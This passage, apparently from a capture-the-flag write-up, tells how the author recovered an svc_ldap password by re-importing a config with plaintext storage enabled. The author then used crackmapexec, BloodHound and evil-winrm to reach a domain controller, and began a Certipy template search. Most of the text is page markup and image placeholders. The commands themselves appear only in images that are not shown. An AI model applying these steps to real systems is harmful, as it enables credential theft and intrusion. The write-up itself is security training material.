url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAaCAYAAAC3g3x9AAAACXBIWXMAAAsTAAALEwEAmpwYAAAEKklEQVR42nVVW28bRRjN3+AiKAjxwlUIHgBRKqFKJGlKuImWB0BC4o/wF3hFPPAOT30BVZFalUDaOEmDjS+J13v37tprO/Z6b7YP5xt308RuRvo0szPznTnfdVcuPf0qXnruTXx0eQNXr2yq+cr763jvnau4/O4q3n7jQzz/1Ct44ZnXniii//Klt/Dis6+r75W11U1cW/8MX9/8TsnNG9/ixlff4JPrX+L6xhfYuPY55E4h62ufnsrax5tzOXO+Ao7ZbIZiyDoeJ8jSDCkly3LkeY4kTjhPkCSJWsv5op6MFbksh1Ecw+10lJiuS2nD4FypN/Bvtcq5jurREQzHhe446kzu2kGA0XiMPMvUw3NAfoyiCJphwLRtdUHEsCw0CFJvNOYzxSaQTyCn3Ub/5EQRSamfpel5QDHF9zx0u12ammIymaDX69G8WEnM8zEfmU2nWBxT7qWLgHLZIiOH5nTIQPZlljMBFxFF8dWiLAPyI6H49EdAkIhOj9IJ112159DMNtkPRyPF9KyMyV4eXWIoPhMnt7shXM+C6xzD6/CBXh/1ZhNHrRbPurB9Hy4fEXEoFh+KqJudDYqgC+3pJIcEf+b8Bhx8D7e5g1qjBcs04FGxzUCIS2y6xiVr2RPfL5lcAM6mk3lOmb8CDzYIuI1my4Fp6Mq/BrNAAH1hScB+v6/ui3+XAMW5WZogCMeIGj8jurMKs3YXx5oFTaPJTBmRFk0XZqZpqllZdhHD6ZRVQZtz83fk93+Ar+9Bt9qwbUsBCYiwFNH1OetCdwmwyLv+4AQdvQnjwTZsvYWm1lKKBYAAF7OmaQgYmAsBh8z8cRJjaPnolGqwNR2e7ylfiUhehmGo1vK4rC8MypxhyGrpoKFv417pF+hmnRF1FCObJXl2FvOFnQBeGJQkjWG3fPzh/4Qfmx+g3BazPQKYjLSpwCTCEetegIqxDMjDnPTHvJyyOk46BhP7EJ52hC59FxIwZC6GTB/5jhjdlEkek2FMnfxR/c8BiZ7xxREPpRXZvOzQbD8YqFa1u3eI/Z1dHO7uo3RQVq1NqkUqRO5aXI845ySVFYApa3Q6HBad8tQUaa6N/3Rot26jdWsLtXKLe5PlbjMYIGVN5+cAuSnDswOCaGhUNdQrxxj0Tk4Vw84AezsVbP15D9t3S7DobwXIqJ8DzFjcCeu0x+gFzK+gpaHL5PWZZz36z2W39tkgQgbGYQfXKxVY1Ro87vUY7YTluNRgpfN6DIxmuDgks939CspkatOfmqRJ24XVDrB3UMP+wxr9WcWRZiud6FELWyo9GXrTwc5fB7iz9TdKO2VlZjEGvSHKD+u4/88+DkoV2Ib35I79uNtMEfghmscGtGNTzaPR+FRpthCMolsv5aHI4zY/Ob0ovwVJ4hGDNo5i9IIum2mECX+ni3rF9/9/z2D7Z5QGYAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="config manager" title="" src="/static/6a87cac5f6e51e785976b9e4b3c99f8f/50637/config-manager.png" srcset="/static/6a87cac5f6e51e785976b9e4b3c99f8f/dda05/config-manager.png 158w, /static/6a87cac5f6e51e785976b9e4b3c99f8f/679a3/config-manager.png 315w, /static/6a87cac5f6e51e785976b9e4b3c99f8f/50637/config-manager.png 630w, /static/6a87cac5f6e51e785976b9e4b3c99f8f/f2f9b/config-manager.png 744w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>So, I downloaded the configuration:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1a9429ce2fb3b840c367583e16cb60a4/a4f82/config-xml.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 71.51898734177216%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACSklEQVR42m1U2W7bMBDMXxSxdfGQKFLUZUW2lTptDuRA0If2/z9mOmRs1wb6MCKX5A53dpe6mYctnubv2PsJQz3i549XLMsjymqAEM0RDr7ZoHEjZLQ9isJBSg9bD+jaCUp9nb1JU40kVVgnCrmsIEqDQlVEeQTnukJWhH1NcE1oCK7nHFe3BW6/5VivCkLgJllLBKSJhK5tJJBVDVkeUf2DMhaKY7hUGa4RgThlMCeeM2FCwrJx0M5CWxfn0ba0nYM6XlbIfxDaxIjPHFeEhKA0RYLgHMiCQ5br6JyLEnlByQUlkyTaXA/7IZj/EoZDpW9gOg/Tf6FqfbwkRBpkRtTXdh5IV0fCNT8nJKmMhHbTo+5baOasahpUXAuyYypO4zEdgTzLLghzVlkGZCWdPQ96FoC5YYVTRhwuCTLzvIyOQWJG6WGeZiruXRVFC4NX0+Jts8N29wg/PMH6PRx7cjYdRlGjSEJ7iNgWATGaS1wWJWN0n5s9fh+ecXh4xfb+A7v7dxyWFzyMO/TNyObtUJPcVC3HFlmqrkiuCEtp8WeY8dJNbFhGkxuIgj2mLItEW1i+DhZBM2+6ifOTxDBeyo2ERV7h0w34uFvQ9nu07Q7WTZg2C7puC+e3mNoZSz9zfeSTq8/SVwF8KQFnwhXz80ZZv6YFtrlDXU8wZoiEI995bSnZTrBVD6N8lK21h5BNnDs7oCqZhiw0eHh6zOGz7fG+5Q9iPmBmlIYFGZm/rpvpMMaIvenh+AMoS3YBU5FlhilwJGWfSneW/hc2UpOaIRrKLQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="config xml" title="" src="/static/1a9429ce2fb3b840c367583e16cb60a4/50637/config-xml.png" srcset="/static/1a9429ce2fb3b840c367583e16cb60a4/dda05/config-xml.png 158w, /static/1a9429ce2fb3b840c367583e16cb60a4/679a3/config-xml.png 315w, /static/1a9429ce2fb3b840c367583e16cb60a4/50637/config-xml.png 630w, /static/1a9429ce2fb3b840c367583e16cb60a4/fddb0/config-xml.png 945w, /static/1a9429ce2fb3b840c367583e16cb60a4/a4f82/config-xml.png 1041w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The XML contained an encrypted password for the <code class="language-text">svc_ldap</code> user:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/723ae68cef40464ebe08f5b3c0b37748/9d01e/encrypted-svc_ldap-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 27.21518987341772%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA6klEQVR42k2QS07EMBBEcw4mH+zEbv/ixA4jhjULYMn9D1NUTCRYPFV3tbpVdue0x2d5RY4H1nAguNLqO73kC6lIoXJWIXOAmlzTmaqv2psIPVoMTwqdPAu+jjess0cmq3bEI0yWfcC2hMv3iEraPCqHTP/cSeqvz9TuXPquD+xMEG1BMBsK6wcTrm6n90tmXdOByHlNTMyXnNzzCw76ojzmXqOzvPrOZef3hpUM5zbEWCCyNU/YT5NgHA36YWk6UIfB0Letv91mwoPCp3wwoV0iDNMaRl9OJdaki4ix5wL/qL+Rf9q81uvGDy/8kqLSKKsPAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="encrypted svc_ldap password" title="" src="/static/723ae68cef40464ebe08f5b3c0b37748/50637/encrypted-svc_ldap-password.png" srcset="/static/723ae68cef40464ebe08f5b3c0b37748/dda05/encrypted-svc_ldap-password.png 158w, /static/723ae68cef40464ebe08f5b3c0b37748/679a3/encrypted-svc_ldap-password.png 315w, /static/723ae68cef40464ebe08f5b3c0b37748/50637/encrypted-svc_ldap-password.png 630w, /static/723ae68cef40464ebe08f5b3c0b37748/fddb0/encrypted-svc_ldap-password.png 945w, /static/723ae68cef40464ebe08f5b3c0b37748/9d01e/encrypted-svc_ldap-password.png 1243w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>At the top of the XML file, there's a comment that mentions how to store values unencrypted by setting the storePlaintextValues property to true:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3fa27dd707091481175f416f33679a41/25187/storePlaintextValues.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABR0lEQVR42l1SW3LCMAzkGkAgtvx2YsKE6fT+J1NXsgNtP3a82kgrS85pNoGtj0wxs3GRrcAnhWgUExsKnYekOQcoZOQnnq70xsnlwr4UtkgW7lJWTjgdTCQm/da55Ir5USd5Yj5N/w0havFI7ub97DftkGlmGz5ThK7LpNMFhhKEpfaOtXJYFw5teXcXPUA3FLVIzPQEDPih344b9h0mGHVTNYTB7e74Pvs/xbMaDE7dTA3tb0MEfowtCLVwhGmUW8rYx6ihj2jGuG48kqyKRqyG57PlGXup309OrweXryfHrbFvK6f9gfFX5QInK9n66ZdFuXy38jAwvMoOs/GcQ+SGGz2Ahn3WlDjhJhndF7xuRUFB0wwU/EZVMLSCWsmvDmu4WD7t5PmFMXeIgg3xLg1uxOtkud0J3CrXGHobumpXAHwDp4vlH1x8AY7ifQ9LAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="storePlaintextValues" title="" src="/static/3fa27dd707091481175f416f33679a41/50637/storePlaintextValues.png" srcset="/static/3fa27dd707091481175f416f33679a41/dda05/storePlaintextValues.png 158w, /static/3fa27dd707091481175f416f33679a41/679a3/storePlaintextValues.png 315w, /static/3fa27dd707091481175f416f33679a41/50637/storePlaintextValues.png 630w, /static/3fa27dd707091481175f416f33679a41/25187/storePlaintextValues.png 818w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Therefore, I edited the config file to include the following property:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/25d1ce1f58bea9b69493fb5176c1af6f/92a8c/new-config.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 82.27848101265823%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAACPElEQVR42oVUy47bMAzMh8S2HpRkS34k2WwX6B56KYr+/w9Nh7KcBAsseiAkUdJwhqR0GoYBcSqYLm9Y5oK1JMxLwVJGzOuKabvQn5G3Dfl2R1kXzDlipn9eZsTgYZyBsQZ9P+BkrYWCGjvABQMXLZxwDBZW1NRn4MPhb2favo4+6R5xDAGNMRiIrJuxCKzfwerBdtEHt89l90l0z73YLLm6vwMqQ6Irdav0m4QKLvtY9/xuer4f+ofpuvr6HifvmQMFNaZGCNlDJl/HNAujMzIZWnmyMUfQg4A/glKyc+7BsEpqcuucMvTCwPzag+EB0hRYefoV51kUMoxkpXmU0SEoy8ZUx0eg0AolL0VpPpX/yKEWRqsUsjwTHfeDvhXBt8t7cfYiHKp0X5VUyTsoI3QEHJlDSq1RtQBmbynzIrWu7Zf5IfmRQztUedpjVsFees34l7709pnPJvnojFrlg6GTgCknTCNHyhEecKaH7TuY8xm2o/FC/x87iZfaMlkSPsodn9cP/OHT+8un93tK+JUnfJYF7+OCmxM4vVhz/g3gLplMfEC4/sR4+YGNb/d9mfDGcVn5Zi93TPNGBRnjOCKlhMx5KfwDpqmazrWnd8mMKNOGuH3A0WlZCEvWpuaW1eTca9/xrKWi4863kjWHelHyFfmqDGes/HnmkvkTZaz8VTauy7IiLjd2QMLQdei6vtmZ1n15eowY5hvG9Y4xSLUgUr+2NFJWFCT6krCtWEAfE4KzVZGPIyTEquofe2HDzwUANyYAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="new config" title="" src="/static/25d1ce1f58bea9b69493fb5176c1af6f/50637/new-config.png" srcset="/static/25d1ce1f58bea9b69493fb5176c1af6f/dda05/new-config.png 158w, /static/25d1ce1f58bea9b69493fb5176c1af6f/679a3/new-config.png 315w, /static/25d1ce1f58bea9b69493fb5176c1af6f/50637/new-config.png 630w, /static/25d1ce1f58bea9b69493fb5176c1af6f/fddb0/new-config.png 945w, /static/25d1ce1f58bea9b69493fb5176c1af6f/92a8c/new-config.png 964w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I imported the modified config which signed out of the current session and restarted the application. After logging back in, I downloaded the new config to confirm that the new property was added:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c90e10cac9f9f1781c53770aaf0b041e/d5b53/view-new-config.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 70.25316455696203%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAACVElEQVR42m1U23LTMBTMZzSNr7JlS7Jkx5ekSd0ypJQp9IUZ+AL+/yOWldwaAjxszpEirXaPjrw59Sd8Ps64tyNGM+Ly8QXz+QIpe4jcIhcOQlj0+zu4ZghzgnM5Y1G26NoDMTHvkOUGmzSrkKQVoqREKhXKWiMva2RFRcgVcVYgyblGcMyYl5L7CmxvUtwQu22G3W2Ojf/ZbXPEkUChFDJuyGUdIDwqxbig4GHLuF7zLOdhuwLRTgRs3pM4KiBtQ1KN0mjIxjCaMPZ5UaugOiVBJqqg1DtJM7mSXRFGVJhThdQk0jqQC25IsnIpgSdh/k7onfiYpOW/hPEb/ILKWtTtGzrL8aLaQ1RLCbxdf2iwT+Vx/B/LgZh/SNdA9W0g9DalNYtlvZAEqCX6mntSX/+VMItLCBKJRKJqHKShIipJebMRLfpDfJ28tRWcT5Il92W4siyFwhfl8HKYcThd4IZnaHeGbUYcaocuZx15i7fbpRtCVxCBIOTimjChwm/jCd8fP+HD/Ix5/oqH+QVP5yc8DScMdkCr93Cmh1EdVN1eEfyNjaXCn7bHDzdgKAz27Pah8MoaRo1HNv5MezkX79haSfT7AnyrxX+MA2ElNL5RhVdj3BHaHKDMhHE8o2km5kcM7oBjz6fH55llNW1mAbc3b+ArWQl3tPxKwtfpHjXrpvUArfYYSLDvjlAc23oPXbrwVmvJ982YphoV87pyKCjqXekmIuFFt3jmpUzTA/puUXa6e8RElc4eYLsTen44bNVCqRZF4T8aDQ/u0Jg9ZNmshL8AcsiUzE4wEdQAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="view new config" title="" src="/static/c90e10cac9f9f1781c53770aaf0b041e/50637/view-new-config.png" srcset="/static/c90e10cac9f9f1781c53770aaf0b041e/dda05/view-new-config.png 158w, /static/c90e10cac9f9f1781c53770aaf0b041e/679a3/view-new-config.png 315w, /static/c90e10cac9f9f1781c53770aaf0b041e/50637/view-new-config.png 630w, /static/c90e10cac9f9f1781c53770aaf0b041e/fddb0/view-new-config.png 945w, /static/c90e10cac9f9f1781c53770aaf0b041e/d5b53/view-new-config.png 1052w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>This allowed me to view the plaintext password of the <code class="language-text">svc_ldap</code> user:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/be2e7a2cac7881f4b8ff4dcce5d40618/4ab8c/svc_ldap-plaintext.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 22.78481012658228%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsSAAALEgHS3X78AAAA+UlEQVR42j2QyXKEMAxE+YyEgWGxjRewjdkGmEOqcshlTvn/j+nIJsnhVbdlVaml7DUf2KYD1h0Y7I5heGBenjjPDzj3SDXnd/jxRBg3COHAiaGfwLlDyzyMDvBuhVYjspdbMNsFxgQqeGj6dNLCcIPqLi6qDnVNkN5LjrLgqEqBMnqirq6+4saQfYcNK02WZoFUUyJOW6cdnfSUxkN0HozS9JRKyugtJQypFlM6O6fErDXIPgOtpSmZctCUTBFdNyRV0iX6fqRmhfytxi1vEvl79BfRX+8G2Zdf4fVItzAQBP9Vwft/4oCmlrRSi6Jgl97+tKUTsET0Pxctksl71quvAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="svc_ldap plaintext password" title="" src="/static/be2e7a2cac7881f4b8ff4dcce5d40618/50637/svc_ldap-plaintext.png" srcset="/static/be2e7a2cac7881f4b8ff4dcce5d40618/dda05/svc_ldap-plaintext.png 158w, /static/be2e7a2cac7881f4b8ff4dcce5d40618/679a3/svc_ldap-plaintext.png 315w, /static/be2e7a2cac7881f4b8ff4dcce5d40618/50637/svc_ldap-plaintext.png 630w, /static/be2e7a2cac7881f4b8ff4dcce5d40618/fddb0/svc_ldap-plaintext.png 945w, /static/be2e7a2cac7881f4b8ff4dcce5d40618/4ab8c/svc_ldap-plaintext.png 1195w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Attempting to authenticate with <code class="language-text">crackmapexec</code> verified that the creds were valid:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/9c05534af8cf613b3659421a34c7acc3/76a04/svc_ldap-verify-creds.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 16.455696202531648%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsSAAALEgHS3X78AAAAuUlEQVR42iWObW6DMBAFuUujJiElGJsCDmCojRDOB1LaSL3/Sabb5MdIT9o3T5tszMRbdWNjH+zqSDetfC0/hPMDJ9mOkWk+43ykcgvKtOTaonQj2bLLLdvji/esIcn6X1QzU7YzzXChC6uIkc9+oagDrb/i4x1jPalxVOFOiN90/kJ5CqjaP9F2IpN7cjytFDKYmZGsHMkrz0E7UmFfdFIO6CawVy1b+SatB5FfQx8ycNC9eMOT/84f+xpkkq/M9LMAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="svc_ldap verify creds" title="" src="/static/9c05534af8cf613b3659421a34c7acc3/50637/svc_ldap-verify-creds.png" srcset="/static/9c05534af8cf613b3659421a34c7acc3/dda05/svc_ldap-verify-creds.png 158w, /static/9c05534af8cf613b3659421a34c7acc3/679a3/svc_ldap-verify-creds.png 315w, /static/9c05534af8cf613b3659421a34c7acc3/50637/svc_ldap-verify-creds.png 630w, /static/9c05534af8cf613b3659421a34c7acc3/76a04/svc_ldap-verify-creds.png 711w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>With the valid creds, I used <code class="language-text">bloodhound-python</code> to collect AD data:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/21e9d3035746cee74a707206c83ed62c/76a04/bloodhound-python.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 72.15189873417721%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsSAAALEgHS3X78AAACUUlEQVR42n1T2XLaQBDUpyRYgAAhIaH7Wh3cYBsTV/7/Tzo9A3acVCUPXbMr2J7pnhnLDnsszTtc8xNOdkDQXBCbE+L2jLDaI2M021fUwzOicou07BGsM0z8HF6QwQ9SxhR+mMLxElhJc0IjDzYvKLoL1sUeQbbBPGwwD2pMlgW+TddEqBjNIozdBPYiwVjg3qP9gNUd3tHtf5D0DVX/gmZzRc9v7f6GzJxZ1QE5q8yYODdHrdKPW6ySDh7jMmoeMLwbWGZLguO7khiStiQXMqk2JYnZ3jRZvXll4htJT0roUkGQ9nDXDXySC6G7rmFlzJizkry9oGSF9XDVP0+8Ao5fwZ6neCJGglmMiSteFYyZYrxIMV3mtIZn/mYV3TMKEko1d9JXhPTQi3tm7jFbVerj1Cs1wYSPn0j8iXnyx91qxa/dTSGSP7wM8y1W6aBJJJl4mNYnJPVRJYrUgAndsFY/l7zL2ar6CxshXb4qpOKxK1XcpX5GlZxotBcZkapce55o/ICV13soWIF4uIw6fSCPPwi+nn8jUdh/wVL/KiE8IqkOOio+/RO/xDfxT3D3r9DK/kvYbN5g+jPazX0Gh9NPjsPwmMEd4oqzx0QpE0qDvjvxXfa/CKdhByc+Yxo/YxYNOn9ivDRCojQn4vbIeZ3vdItGfCjEgpETEV+6vCpZibkiKE5YxgNl38mics813Kmv0mlB0hz1+2xVq4pV0mvHvagljM6nVVLawO0wlCsrJgQi14s7VrSFrKZ0v2T3JVFM+Q69Hesw54+hfgz2IsUvr6rNV5UMEBoAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="bloodhound-python" title="" src="/static/21e9d3035746cee74a707206c83ed62c/50637/bloodhound-python.png" srcset="/static/21e9d3035746cee74a707206c83ed62c/dda05/bloodhound-python.png 158w, /static/21e9d3035746cee74a707206c83ed62c/679a3/bloodhound-python.png 315w, /static/21e9d3035746cee74a707206c83ed62c/50637/bloodhound-python.png 630w, /static/21e9d3035746cee74a707206c83ed62c/76a04/bloodhound-python.png 711w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After importing the data into <code class="language-text">bloodhound</code>, I found that <code class="language-text">svc_ldap</code> could PSRemote into the DC, this was a strong indication that I could make a WinRM connection to the machine:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/6cdd5ba02d5371cda6d59cde0fee07f0/6ce55/bloodhound-psremote.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 35.44303797468354%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABeklEQVR42p2Ry0obcRTG8wbSlVoq4qXaJKOTyUzm3kkmE5VEWzEipsELWrUYC5JgVIwYCBF0YRdCKXTjC/gEvtzP/0wIKO5cfJwL5zuX78RmdY/3QDFzEWTDI5F2mEhqzGS+EusXJFWHRMohpftvyGHhq1hgWjEFrIjnBEUOjup0b+6IyUaWKdlga7dG8/qSj9IEsiqIRo+cEluodj6y4Tay5ZNWDBJDg8ifRvi5X+PP/T/qpy2C0kqvYVyzWciVyT0U+LAxRqN2xXm7w+/GGbXjJofHJ6xv7rG4UiFbKmPNyLRck6aZoVKpkhe5wdEvjCfTxMJz0naAJHQY2Bhm7/GJ1f0Oludj+kV0bx7VCQTyQjMfzS0wPatRiMcxPk9R3fnF/d//XLS7LK1Wew1DUnbhOzlvmez8Gs7cNxRxWqiPpLmRhiFCX/fmCBbLKMLq+aLQr4QtBv/YPqDdve09JSpWXSTdFU0s4dtvHvHyQeGgvt+PJ6UM8ZTFMwhO9eEhqpENAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="bloodhound PSRemote" title="" src="/static/6cdd5ba02d5371cda6d59cde0fee07f0/50637/bloodhound-psremote.png" srcset="/static/6cdd5ba02d5371cda6d59cde0fee07f0/dda05/bloodhound-psremote.png 158w, /static/6cdd5ba02d5371cda6d59cde0fee07f0/679a3/bloodhound-psremote.png 315w, /static/6cdd5ba02d5371cda6d59cde0fee07f0/50637/bloodhound-psremote.png 630w, /static/6cdd5ba02d5371cda6d59cde0fee07f0/6ce55/bloodhound-psremote.png 745w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">evil-winrm</code> established a connection as the <code class="language-text">svc_ldap</code> user:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4ad396b73ebd102be6424e842811f8a8/7605c/evil-winrm-user-flag.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 68.9873417721519%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsSAAALEgHS3X78AAACgElEQVR42m1T2XLbMBDTn7RRrJO6KImkbks+Y6eTafv//4KCdNJkpn3ALLkSwQV26YVyQ6jeEOqfCKs95sMb1tMvHK+/MW1vbi/1AaHoIKoFcTEhKSfEWYfnqMFzKB18GxMF76k8wZd3+PUr/HxDWp+IIw/tERYzRH1AXK3wswkpCaOsR5wPCESPp0gTBk9xh++M33YlvLHVGNoOszIYGwMjFaamxtLWUFXjMHM91hJVJlHnDWShmFcoS41GarQWRcm8JawtQYu5UTykSdjhaAw2ozHyoq7usFc9VtWhLgdkYkSWDcjzESljxljmhvkGohjgJekGIU5MXJAkB2QpJRN2HUQT/ekZF+y4DuIJUTIjSuml2CMSXNsYjwiTHmG2wLPJRCy8bUVaHpBUJwh5pl+Hx76+uFwiL2zESPP1u3fqgVjDjxmDAn6q4XXNhqleKWmlHz1qfUFjzpDqBNW/oO1v3F9RqTMafUaSzySeednCxi2samR32fGwgR9U8GSiocIWY1xDW3P7K/RwRUvSbrq/4+ZGJmXXc7ki4wQUzcHBkvqxIWnPMWKFO5adMSmK2UkSJUeFs5YSGeeyYPURR8QP1V8821EJKJvy/cg8KnyHl/DnNJ8cSchEQlJLUsi9q0a42RvdZTG7GvCfHSt6xAeeP2AJDSVGaUf9LWOPkjL6+Y6eMlV3wfddwwoHdOONuKPi9w/SD8KvpF5Msp3tGg/GPJixoiAxCJkXfGLuIL/bvVVifbQWPAi/4kHsNXxGHQ8O1QSjZmh2thturqJHt4+sanN+5rTBevwv2Sc8RbKxmjFJkpoVw/ID4/KKcX6FGV5QtZuzoNYn18VPuf8n/APiVrsTirXnCgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="evil-winrm user flag" title="" src="/static/4ad396b73ebd102be6424e842811f8a8/50637/evil-winrm-user-flag.png" srcset="/static/4ad396b73ebd102be6424e842811f8a8/dda05/evil-winrm-user-flag.png 158w, /static/4ad396b73ebd102be6424e842811f8a8/679a3/evil-winrm-user-flag.png 315w, /static/4ad396b73ebd102be6424e842811f8a8/50637/evil-winrm-user-flag.png 630w, /static/4ad396b73ebd102be6424e842811f8a8/7605c/evil-winrm-user-flag.png 703w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>As part of the process of enumerating AD for potential vectors to escalate privileges, I ran <a href="https://github.com/ly4k/Certipy" target="_blank">Certipy</a> to look for any vulnerable certificate templates:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c7ff88fb2ccf79b0fe3b79b10e3920f3/a9fc9/certipy-find.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 48.10126582278481%; position: relative; bottom: 0; left: 0; background-image: 